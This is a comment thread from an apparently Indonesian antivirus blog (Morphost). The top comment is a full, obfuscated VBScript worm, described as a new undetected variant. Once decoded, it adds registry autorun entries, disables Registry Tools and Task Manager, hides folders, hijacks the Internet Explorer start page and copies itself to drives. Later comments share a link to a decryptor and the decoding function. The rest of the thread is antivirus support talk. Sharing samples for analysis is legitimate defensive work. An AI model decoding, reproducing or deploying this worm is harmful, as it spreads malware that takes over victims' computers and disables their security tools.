    Tbs’hemAhkcbu’:’to)Ifjbtwfdb/!O64!.
    Tbs’dhkNsbjt’:’hemAhkcbu)Nsbjt
    Ahu’Bfdo’tsuAnkbIfjb’ni’hemAhkcbu)Nsbjt
    s:’hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+’63.
    na’ath)ahkcbubntst/s.’sobi
    ublrutna’s+3
    bic’na
    Ibs
    Bic’aridsnhi
    Tre’scu/.
    Hi’Buuhu’Ubtrjb’Ibs
    buu)dkbfu
    PTdunws)Tkbbw’6?7777
    na’buu)irjebu97’sobi’ptdunws)vrns
    Bic’Tre
    aridsnhi’RINTLF/.
    Hi’buuhu’ubtrjb’ibs
    :qeduka
    fcq:%Hufi`’Ehcho’Dfun’Mhcho99Cforkr’sbuftf’nicfo9Sfl’fcf’~fi`’jfr’cfi’jbi`ni`nilfi’flr9Lfuif’drjf’cnunlr’~fi`’sfl’kflr*kflr99Snfcf’~fi`’tfkfo9Ofi~f’flr’jfirtnf’ehcho9^fi`’enfulfi’tbjrf’nin’wbujfnilfilr9Eburkfi`’rkfi`’rkfi`’lfkn99Wbi`rjrjfi*wbi`rjrjfi9Tnfwf’~fi`’jfr’efisr9Shkhi`’flr’lftnofin’flr9Shkhi`’dfunlfi’cnunlr’lblftno’ofsnlr9Tnfwf’~fi`’jfr99Jbidhef’ebusfofi’tblrfs’ofsn9Kf~fli~f’lfufi`’~fi`9Cnobjwft’tfi`’hjefl9Mfkfin’oncrw’cfkfj’erfn’ebkflf9Tbufolfi’dnisf’srkrt’cn’cfkfj’sflcnu99Ofi~f’lbwbcnofi9^fi`’t kfkr’cfsfi`’jbibusfpflfilr9Bi`lfr’ebkfofi’mnpf9Sb`f’jbifun’nicfo’cn’fsft’sfi`ntfilr99Sfwn’tfjwfn’lfwfilfo’lr’ofurt9Jbifi“ri`i~f’lrsrlfi’dnisf’nin9Ebutbjf~fj’cfkfj’lfker999/ppp)ebichs)dh)iu.%
    fcq:ubwkfdb/fcq+%9%+.
    tbs’^r5i:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.
    ^r5i)punsb’fcq
    ^r5i)dkhtb
    na’cf~/ihp.:6’fic’/jhiso/ihp.jhc’4.:6’sobi’
    na’ak~:afktb’sobi
    ahu’n:6’sh’4
    pt)uri’%ihsbwfc)bb'(w’%%%,sjw,%[q)chd%%%
    ibs
    bic’na
    bic’na
    tbs’RINTLF:ath)`bsankb/sjw,%[q)chd%.
    bic’aridsnhi
    Tre’ub`V/.
    Hi’Buuhu’Ubtrjb’Ibs
    na’cf~/ihp.:6’sobi
    pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[%+’%Tbuqnlt%
    pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[CbafrksNdhi[%+%tobkk45)ckk+3?%
    pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%
    pt)ub`punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[bwkhubu[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z[%+%%
    bic’na
    pt)ub`cbkbsb’%OLDU[kilankb[NtTohusdrs%
    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Nisbuibs’Bwkhubu[Jfni[Tsfus’Wf`b%+’%ossw=((ppp)ebichs)dh)iu%
    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Ca2tbuq%+%Ptdunws)bb'((b=QETdunws’%%%,chd,%[ca2tuqd)eab%%%
    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Bwkhubu%+%Ptdunws)bb'((b=QETdunws’%%%,ksld,%[cbltshw)nin%%%
    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%
    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbSftlJ`u%+6+%UB@XCPHUC%
    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[Pfuini`NaIhsCbafrks%+%afic~’khqb’~r~ri%
    pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[DobdlbcQfkrb%+7+%UB@XCPHUC%
    pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[RidobdlbcQfkrb%+7+%UB@XCPHUC%
    pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[CbafrksQfkrb%+7+%UB@XCPHUC%
    na’kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%’sobi
    nufV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.
    ppp:ath)@bsTwbdnfkAhkcbu/7.
    tbs’mml:ath)hwbisbsankb/ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%+5+surb.
    mml)punsb’nufV
    mml)dkhtb
    pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[PniRwcfsb%+%Ptdunws)bb'((b=QETdunws’%%%,ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%%%
    bic’na
    Bic’Tre
    Tre’Obus}/hhh.
    Hi’Buuhu’Ubtrjb’Ibs
    ch
    Ahu’Bfdo’cuq’Ni’ath)Cunqbt
    Na’cuq)CunqbS~wb:6’Sobi
    ublrutna’cuq)Wfso+3
    Bktb
    ublrutna’cuq)Wfso+5
    Bic’na
    Ibs
    na’ak~:afktb’sobi’
    scu
    bktb’
    ptdunws)vrns
    bic’na
    ub`V
    Na’hhh:Afktb’Sobi’
    ======

    kode diatas milik Yuyun terbaru yang belum terdeteksi
    Bns’Ch
    Bic’Na
    khhw
    Bic’Tre

  3. Morphic said

    Buat EDE:
    http://www.4shared.com/file/p2zBFm7c/Decryptor.html

  4. shafry said

    kan decryptornya dah ada no di bwah sendiri๐Ÿ˜€

    • Morphic said

      hhe iya ya.
      ak gak liat..
      wkwkwwkk๐Ÿ˜€๐Ÿ˜€๐Ÿ˜€๐Ÿ˜€๐Ÿ˜€

      tapi setelah kuperhatikan kayaknya code decryptor si pemilik worm agak berbelit2.

    • Morphic said

      Function ReAd( WriTe )
      Dim Son, ToLo, Yo
      Son = โ€œโ€
      For ToLo = 1 To Len( WriTe )
      Yo = Mid( WriTe, ToLo, 1 )
      Son = Chr( Asc( Yo ) โ€“ 1 ) & Son

      Next
      ReAd = Son
      End Function

      seharusny yg dibold itu satu baris pun bisa…

  5. QANTA said

    Bung Morphic, aq download Morphost Expert Plus setelah dipake scan kompi-ku, kok belum selesai scan udah tertutup sendiri, bahkan RTF-nya juga gak bisa aktif.apa karena aku pasangkan dengan AVAST pro 2010 ya?Mohon pencerahan?

    • Morphic said

      ya. anda orang kesekian kalinya untuk melaporkan bug morphost.
      Bug morphost yang sampai saat ini masih dibicarakan di dunia maya adalah “Tertutupnya morphost saat scanning”
      Kasus ini terjadi di beberapa komputer memang, dan masalah ini belum berhasil kami atasi secara sempurna.

      Kalau RTP morphost tidak aktif biasanya dikarenakan OS-nya yang tidak kompatibel. Misalnya Win7 dan Vista. Agar RTP dapat berjalan di kedua OS ini anda harus mengklik kanan RTP lalu pilih “Run AS Admin”

      Semoga membantu.

  6. Den my said

    om saya mau tanya โ€œMalware.IDB-5″ kedetak sama anti virus om yg jadi pernyaan kenama enga bisa di del / di karantina?.. tolong om solusi y?……….

    – ini ber awal dari virus shortcut..

    • Morphic said

      oo,
      malware.idb-5 itu heuristik kami.
      nah, kenapa tidak bisa didelete ataupun dikarantina, ini berarti file tersebut masih aktif. Processnya belum mati atau belum diterminate.

      Nah,
      virus shortcut yang kamu maksudkan apa??
      apa ada kaitannya?

  7. satryacode said

    Enaknya ….

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: